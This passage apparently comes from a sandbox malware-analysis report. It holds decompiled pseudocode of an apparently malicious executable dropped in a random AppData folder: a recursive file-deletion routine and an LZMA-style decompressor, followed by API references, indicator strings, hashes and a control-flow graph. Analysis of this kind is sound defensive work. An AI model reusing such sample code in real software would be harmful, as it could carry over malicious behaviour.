                          							if( *((char*)(_t75 + 2)) == 0) {
                          								goto L27;
                          							}
                          							goto L19;
                          							L27:
                          							_t55 = FindNextFileA(_a4,  &_v332);
                          							__eflags = _t55;
                          						} while (_t55 != 0);
                          						_t37 = FindClose(_a4);
                          						goto L29;
                          					}
                          					__eflags =  *0x4214a0 - 0x5c;
                          					if( *0x4214a0 != 0x5c) {
                          						goto L11;
                          					}
                          					goto L10;
                          				} else {
                          					__eflags = _t37;
                          					if(_t37 == 0) {
                          						L31:
                          						__eflags = _v8;
                          						if(_v8 == 0) {
                          							L39:
                          							return _t37;
                          						}
                          						__eflags = _v12;
                          						if(_v12 != 0) {
                          							_t37 = E00405D7C(_t72);
                          							__eflags = _t37;
                          							if(_t37 == 0) {
                          								goto L39;
                          							}
                          							E00405578(_t72);
                          							E0040573D(_t72);
                          							_t37 = RemoveDirectoryA(_t72);
                          							__eflags = _t37;
                          							if(_t37 != 0) {
                          								return E00404E23(0xffffffe5, _t72);
                          							}
                          							__eflags = _a8 & 0x00000004;
                          							if((_a8 & 0x00000004) == 0) {
                          								goto L33;
                          							}
                          							E00404E23(0xfffffff1, _t72);
                          							_push(0);
                          							_push(_t72);
                          							return E004057D3();
                          						}
                          						L33:
                          						 *0x423f28 =  *0x423f28 + 1;
                          						return _t37;
                          					}
                          					__eflags = _a8 & 0x00000002;
                          					if((_a8 & 0x00000002) == 0) {
                          						goto L31;
                          					}
                          					goto L5;
                          				}
                          			}

















                          0x004053b5
                          0x004053b9
                          0x004053c2
                          0x004053c5
                          0x004053c8
                          0x004053d0
                          0x004053d2
                          0x004053d3
                          0x00000000
                          0x004053d3
                          0x004053e2
                          0x004053e2
                          0x004053e5
                          0x004053e8
                          0x004053fc
                          0x00405403
                          0x00405408
                          0x0040540a
                          0x0040541a
                          0x0040540c
                          0x00405412
                          0x00405412
                          0x0040541f
                          0x00405422
                          0x0040542d
                          0x00405433
                          0x00405438
                          0x00405448
                          0x0040544a
                          0x00405450
                          0x00405453
                          0x00405456
                          0x00405513
                          0x00405513
                          0x00405517
                          0x00405519
                          0x00405519
                          0x00405519
                          0x00405519
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040545c
                          0x0040545c
                          0x00405465
                          0x0040546b
                          0x00405470
                          0x00405473
                          0x00405475
                          0x00405479
                          0x0040547b
                          0x0040547b
                          0x00405479
                          0x0040547e
                          0x00405481
                          0x00405494
                          0x00405496
                          0x0040549b
                          0x004054a2
                          0x004054ba
                          0x004054c0
                          0x004054c6
                          0x004054c8
                          0x004054ed
                          0x004054ca
                          0x004054ca
                          0x004054ce
                          0x004054e2
                          0x004054d0
                          0x004054d3
                          0x004054d8
                          0x004054da
                          0x004054db
                          0x004054db
                          0x004054ce
                          0x004054a4
                          0x004054aa
                          0x004054ac
                          0x004054b2
                          0x004054b2
                          0x004054ac
                          0x00000000
                          0x004054a2
                          0x00405483
                          0x00405486
                          0x00405488
                          0x00000000
                          0x00000000
                          0x0040548a
                          0x0040548c
                          0x00000000
                          0x00000000
                          0x0040548e
                          0x00405492
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004054f2
                          0x004054fc
                          0x00405502
                          0x00405502
                          0x0040550d
                          0x00000000
                          0x0040550d
                          0x00405424
                          0x0040542b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004053ea
                          0x004053ea
                          0x004053ec
                          0x0040551d
                          0x00405520
                          0x00405523
                          0x00405575
                          0x00405575
                          0x00405575
                          0x00405525
                          0x00405528
                          0x00405533
                          0x00405538
                          0x0040553a
                          0x00000000
                          0x00000000
                          0x0040553d
                          0x00405543
                          0x00405549
                          0x0040554f
                          0x00405551
                          0x00000000
                          0x0040556d
                          0x00405553
                          0x00405557
                          0x00000000
                          0x00000000
                          0x0040555c
                          0x00405561
                          0x00405562
                          0x00000000
                          0x00405563
                          0x0040552a
                          0x0040552a
                          0x00000000
                          0x0040552a
                          0x004053f2
                          0x004053f6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004053f6

                          APIs
                          • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,73BCF560), ref: 004053C8
                          • lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,73BCF560), ref: 00405412
                          • lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,73BCF560), ref: 00405433
                          • lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,73BCF560), ref: 00405439
                          • FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,73BCF560), ref: 0040544A
                          • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
                          • FindClose.KERNEL32(?), ref: 0040550D
                          Strings
                          • \*.*, xrefs: 0040540C
                          • "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" , xrefs: 004053B4
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                          • String ID: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                          • API String ID: 2035342205-1208413142
                          • Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                          • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                          • Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                          • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 519 40604c-406051 520 4060c2-4060e0 519->520 521 406053-406082 519->521 522 4066b8-4066cd 520->522 523 406084-406087 521->523 524 406089-40608d 521->524 525 4066e7-4066fd 522->525 526 4066cf-4066e5 522->526 527 406099-40609c 523->527 528 406095 524->528 529 40608f-406093 524->529 530 406700-406707 525->530 526->530 531 4060ba-4060bd 527->531 532 40609e-4060a7 527->532 528->527 529->527 536 406709-40670d 530->536 537 40672e-40673a 530->537 535 40628f-4062ad 531->535 533 4060a9 532->533 534 4060ac-4060b8 532->534 533->534 538 406122-406150 534->538 542 4062c5-4062d7 535->542 543 4062af-4062c3 535->543 539 406713-40672b 536->539 540 4068bc-4068c6 536->540 544 405ed0-405ed9 537->544 545 406152-40616a 538->545 546 40616c-406186 538->546 539->537 547 4068d2-4068e5 540->547 548 4062da-4062e4 542->548 543->548 549 4068e7 544->549 550 405edf 544->550 551 406189-406193 545->551 546->551 552 4068ea-4068ee 547->552 553 4062e6 548->553 554 406287-40628d 548->554 549->552 556 405ee6-405eea 550->556 557 406026-406047 550->557 558 405f8b-405f8f 550->558 559 405ffb-405fff 550->559 561 406199 551->561 562 40610a-406110 551->562 570 40626c-406284 553->570 571 40686e-406878 553->571 554->535 560 40622b-406235 554->560 556->547 563 405ef0-405efd 556->563 557->522 572 405f95-405fae 558->572 573 40683b-406845 558->573 564 406005-406019 559->564 565 40684a-406854 559->565 566 40687a-406884 560->566 567 40623b-406404 560->567 578 406856-406860 561->578 579 4060ef-406107 561->579 568 4061c3-4061c9 562->568 569 406116-40611c 562->569 563->549 577 405f03-405f49 563->577 580 40601c-406024 564->580 565->547 566->547 567->544 575 406227 568->575 576 4061cb-4061e9 568->576 569->538 569->575 570->554 571->547 582 405fb1-405fb5 572->582 573->547 575->560 583 406201-406213 576->583 584 4061eb-4061ff 576->584 585 405f71-405f73 577->585 586 405f4b-405f4f 577->586 578->547 579->562 580->557 580->559 582->558 587 405fb7-405fbd 582->587 590 406216-406220 583->590 584->590 593 405f81-405f89 585->593 594 405f75-405f7f 585->594 591 405f51-405f54 GlobalFree 586->591 592 405f5a-405f68 GlobalAlloc 586->592 588 405fe7-405ff9 587->588 589 405fbf-405fc6 587->589 588->580 595 405fd1-405fe1 GlobalAlloc 589->595 596 405fc8-405fcb GlobalFree 589->596 590->568 597 406222 590->597 591->592 592->549 598 405f6e 592->598 593->582 594->593 594->594 595->549 595->588 596->595 600 406862-40686c 597->600 601 4061a8-4061c0 597->601 598->585 600->547 601->568
                          C-Code - Quality: 98%
                          			E0040604C() {
                          				unsigned short _t531;
                          				signed int _t532;
                          				void _t533;
                          				void* _t534;
                          				signed int _t535;
                          				signed int _t565;
                          				signed int _t568;
                          				signed int _t590;
                          				signed int* _t607;
                          				void* _t614;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t614 - 0x40) != 0) {
                          						 *(_t614 - 0x34) = 1;
                          						 *(_t614 - 0x84) = 7;
                          						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                          						L132:
                          						 *(_t614 - 0x54) = _t607;
                          						L133:
                          						_t531 =  *_t607;
                          						_t590 = _t531 & 0x0000ffff;
                          						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                          						if( *(_t614 - 0xc) >= _t565) {
                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                          							 *(_t614 - 0x40) = 1;
                          							_t532 = _t531 - (_t531 >> 5);
                          							 *_t607 = _t532;
                          						} else {
                          							 *(_t614 - 0x10) = _t565;
                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                          							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                          						}
                          						if( *(_t614 - 0x10) >= 0x1000000) {
                          							L139:
                          							_t533 =  *(_t614 - 0x84);
                          							L140:
                          							 *(_t614 - 0x88) = _t533;
                          							goto L1;
                          						} else {
                          							L137:
                          							if( *(_t614 - 0x6c) == 0) {
                          								 *(_t614 - 0x88) = 5;
                          								goto L170;
                          							}
                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                          							goto L139;
                          						}
                          					} else {
                          						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          						__esi =  *(__ebp - 0x60);
                          						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          						__ecx =  *(__ebp - 0x3c);
                          						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          						__ecx =  *(__ebp - 4);
                          						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          						if( *(__ebp - 0x38) >= 4) {
                          							if( *(__ebp - 0x38) >= 0xa) {
                          								_t97 = __ebp - 0x38;
                          								 *_t97 =  *(__ebp - 0x38) - 6;
                          							} else {
                          								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          							}
                          						} else {
                          							 *(__ebp - 0x38) = 0;
                          						}
                          						if( *(__ebp - 0x34) == __edx) {
                          							__ebx = 0;
                          							__ebx = 1;
                          							L60:
                          							__eax =  *(__ebp - 0x58);
                          							__edx = __ebx + __ebx;
                          							__ecx =  *(__ebp - 0x10);
                          							__esi = __edx + __eax;
                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                          							__ax =  *__esi;
                          							 *(__ebp - 0x54) = __esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								_t216 = __edx + 1; // 0x1
                          								__ebx = _t216;
                          								__cx = __ax >> 5;
                          								 *__esi = __ax;
                          							} else {
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							 *(__ebp - 0x44) = __ebx;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								L59:
                          								if(__ebx >= 0x100) {
                          									goto L54;
                          								}
                          								goto L60;
                          							} else {
                          								L57:
                          								if( *(__ebp - 0x6c) == 0) {
                          									 *(__ebp - 0x88) = 0xf;
                          									goto L170;
                          								}
                          								__ecx =  *(__ebp - 0x70);
                          								__eax =  *(__ebp - 0xc);
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          								_t202 = __ebp - 0x70;
                          								 *_t202 =  *(__ebp - 0x70) + 1;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          								goto L59;
                          							}
                          						} else {
                          							__eax =  *(__ebp - 0x14);
                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          							if(__eax >=  *(__ebp - 0x74)) {
                          								__eax = __eax +  *(__ebp - 0x74);
                          							}
                          							__ecx =  *(__ebp - 8);
                          							__ebx = 0;
                          							__ebx = 1;
                          							__al =  *((intOrPtr*)(__eax + __ecx));
                          							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          							L40:
                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          							__ecx =  *(__ebp - 0x58);
                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          							 *(__ebp - 0x48) = __eax;
                          							__eax = __eax + 1;
                          							__eax = __eax << 8;
                          							__eax = __eax + __ebx;
                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          							__ax =  *__esi;
                          							 *(__ebp - 0x54) = __esi;
                          							__edx = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								 *(__ebp - 0x40) = 1;
                          								__cx = __ax >> 5;
                          								__ebx = __ebx + __ebx + 1;
                          								 *__esi = __ax;
                          							} else {
                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edx;
                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							 *(__ebp - 0x44) = __ebx;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								L38:
                          								__eax =  *(__ebp - 0x40);
                          								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          									while(1) {
                          										if(__ebx >= 0x100) {
                          											break;
                          										}
                          										__eax =  *(__ebp - 0x58);
                          										__edx = __ebx + __ebx;
                          										__ecx =  *(__ebp - 0x10);
                          										__esi = __edx + __eax;
                          										__ecx =  *(__ebp - 0x10) >> 0xb;
                          										__ax =  *__esi;
                          										 *(__ebp - 0x54) = __esi;
                          										__edi = __ax & 0x0000ffff;
                          										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          										if( *(__ebp - 0xc) >= __ecx) {
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          											__cx = __ax;
                          											_t169 = __edx + 1; // 0x1
                          											__ebx = _t169;
                          											__cx = __ax >> 5;
                          											 *__esi = __ax;
                          										} else {
                          											 *(__ebp - 0x10) = __ecx;
                          											0x800 = 0x800 - __edi;
                          											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          											__ebx = __ebx + __ebx;
                          											 *__esi = __cx;
                          										}
                          										 *(__ebp - 0x44) = __ebx;
                          										if( *(__ebp - 0x10) < 0x1000000) {
                          											L45:
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xe;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t155 = __ebp - 0x70;
                          											 *_t155 =  *(__ebp - 0x70) + 1;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          										}
                          									}
                          									L53:
                          									_t172 = __ebp - 0x34;
                          									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                          									L54:
                          									__al =  *(__ebp - 0x44);
                          									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          									L55:
                          									if( *(__ebp - 0x64) == 0) {
                          										 *(__ebp - 0x88) = 0x1a;
                          										goto L170;
                          									}
                          									__ecx =  *(__ebp - 0x68);
                          									__al =  *(__ebp - 0x5c);
                          									__edx =  *(__ebp - 8);
                          									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          									 *( *(__ebp - 0x68)) = __al;
                          									__ecx =  *(__ebp - 0x14);
                          									 *(__ecx +  *(__ebp - 8)) = __al;
                          									__eax = __ecx + 1;
                          									__edx = 0;
                          									_t191 = __eax %  *(__ebp - 0x74);
                          									__eax = __eax /  *(__ebp - 0x74);
                          									__edx = _t191;
                          									L79:
                          									 *(__ebp - 0x14) = __edx;
                          									L80:
                          									 *(__ebp - 0x88) = 2;
                          									goto L1;
                          								}
                          								if(__ebx >= 0x100) {
                          									goto L53;
                          								}
                          								goto L40;
                          							} else {
                          								L36:
                          								if( *(__ebp - 0x6c) == 0) {
                          									 *(__ebp - 0x88) = 0xd;
                          									L170:
                          									_t568 = 0x22;
                          									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                          									_t535 = 0;
                          									L172:
                          									return _t535;
                          								}
                          								__ecx =  *(__ebp - 0x70);
                          								__eax =  *(__ebp - 0xc);
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          								_t121 = __ebp - 0x70;
                          								 *_t121 =  *(__ebp - 0x70) + 1;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          								goto L38;
                          							}
                          						}
                          					}
                          					L1:
                          					_t534 =  *(_t614 - 0x88);
                          					if(_t534 > 0x1c) {
                          						L171:
                          						_t535 = _t534 | 0xffffffff;
                          						goto L172;
                          					}
                          					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                          						case 0:
                          							if( *(_t614 - 0x6c) == 0) {
                          								goto L170;
                          							}
                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                          							_t534 =  *( *(_t614 - 0x70));
                          							if(_t534 > 0xe1) {
                          								goto L171;
                          							}
                          							_t538 = _t534 & 0x000000ff;
                          							_push(0x2d);
                          							asm("cdq");
                          							_pop(_t570);
                          							_push(9);
                          							_pop(_t571);
                          							_t610 = _t538 / _t570;
                          							_t540 = _t538 % _t570 & 0x000000ff;
                          							asm("cdq");
                          							_t605 = _t540 % _t571 & 0x000000ff;
                          							 *(_t614 - 0x3c) = _t605;
                          							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                          							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                          							_t613 = (0x300 << _t605 + _t610) + 0x736;
                          							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                          								L10:
                          								if(_t613 == 0) {
                          									L12:
                          									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                          									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                          									goto L15;
                          								} else {
                          									goto L11;
                          								}
                          								do {
                          									L11:
                          									_t613 = _t613 - 1;
                          									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                          								} while (_t613 != 0);
                          								goto L12;
                          							}
                          							if( *(_t614 - 4) != 0) {
                          								GlobalFree( *(_t614 - 4));
                          							}
                          							_t534 = GlobalAlloc(0x40, 0x600); // executed
                          							 *(_t614 - 4) = _t534;
                          							if(_t534 == 0) {
                          								goto L171;
                          							} else {
                          								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                          								goto L10;
                          							}
                          						case 1:
                          							L13:
                          							__eflags =  *(_t614 - 0x6c);
                          							if( *(_t614 - 0x6c) == 0) {
                          								 *(_t614 - 0x88) = 1;
                          								goto L170;
                          							}
                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                          							_t45 = _t614 - 0x48;
                          							 *_t45 =  *(_t614 - 0x48) + 1;
                          							__eflags =  *_t45;
                          							L15:
                          							if( *(_t614 - 0x48) < 4) {
                          								goto L13;
                          							}
                          							_t546 =  *(_t614 - 0x40);
                          							if(_t546 ==  *(_t614 - 0x74)) {
                          								L20:
                          								 *(_t614 - 0x48) = 5;
                          								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                          								goto L23;
                          							}
                          							 *(_t614 - 0x74) = _t546;
                          							if( *(_t614 - 8) != 0) {
                          								GlobalFree( *(_t614 - 8));
                          							}
                          							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                          							 *(_t614 - 8) = _t534;
                          							if(_t534 == 0) {
                          								goto L171;
                          							} else {
                          								goto L20;
                          							}
                          						case 2:
                          							L24:
                          							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                          							 *(_t614 - 0x84) = 6;
                          							 *(_t614 - 0x4c) = _t553;
                          							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                          							goto L132;
                          						case 3:
                          							L21:
                          							__eflags =  *(_t614 - 0x6c);
                          							if( *(_t614 - 0x6c) == 0) {
                          								 *(_t614 - 0x88) = 3;
                          								goto L170;
                          							}
                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                          							_t67 = _t614 - 0x70;
                          							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                          							__eflags =  *_t67;
                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                          							L23:
                          							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                          							if( *(_t614 - 0x48) != 0) {
                          								goto L21;
                          							}
                          							goto L24;
                          						case 4:
                          							goto L133;
                          						case 5:
                          							goto L137;
                          						case 6:
                          							goto L0;
                          						case 7:
                          							__eflags =  *(__ebp - 0x40) - 1;
                          							if( *(__ebp - 0x40) != 1) {
                          								__eax =  *(__ebp - 0x24);
                          								 *(__ebp - 0x80) = 0x16;
                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          								__eax =  *(__ebp - 0x28);
                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          								__eax =  *(__ebp - 0x2c);
                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          								__eax = 0;
                          								__eflags =  *(__ebp - 0x38) - 7;
                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          								__al = __al & 0x000000fd;
                          								__eax = (__eflags >= 0) - 1 + 0xa;
                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          								__eax =  *(__ebp - 4);
                          								__eax =  *(__ebp - 4) + 0x664;
                          								__eflags = __eax;
                          								 *(__ebp - 0x58) = __eax;
                          								goto L68;
                          							}
                          							__eax =  *(__ebp - 4);
                          							__ecx =  *(__ebp - 0x38);
                          							 *(__ebp - 0x84) = 8;
                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          							goto L132;
                          						case 8:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x84) = 0xa;
                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          							} else {
                          								__eax =  *(__ebp - 0x38);
                          								__ecx =  *(__ebp - 4);
                          								__eax =  *(__ebp - 0x38) + 0xf;
                          								 *(__ebp - 0x84) = 9;
                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          							}
                          							goto L132;
                          						case 9:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								goto L89;
                          							}
                          							__eflags =  *(__ebp - 0x60);
                          							if( *(__ebp - 0x60) == 0) {
                          								goto L171;
                          							}
                          							__eax = 0;
                          							__eflags =  *(__ebp - 0x38) - 7;
                          							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                          							__eflags = _t258;
                          							0 | _t258 = _t258 + _t258 + 9;
                          							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                          							goto L75;
                          						case 0xa:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x84) = 0xb;
                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x28);
                          							goto L88;
                          						case 0xb:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__ecx =  *(__ebp - 0x24);
                          								__eax =  *(__ebp - 0x20);
                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
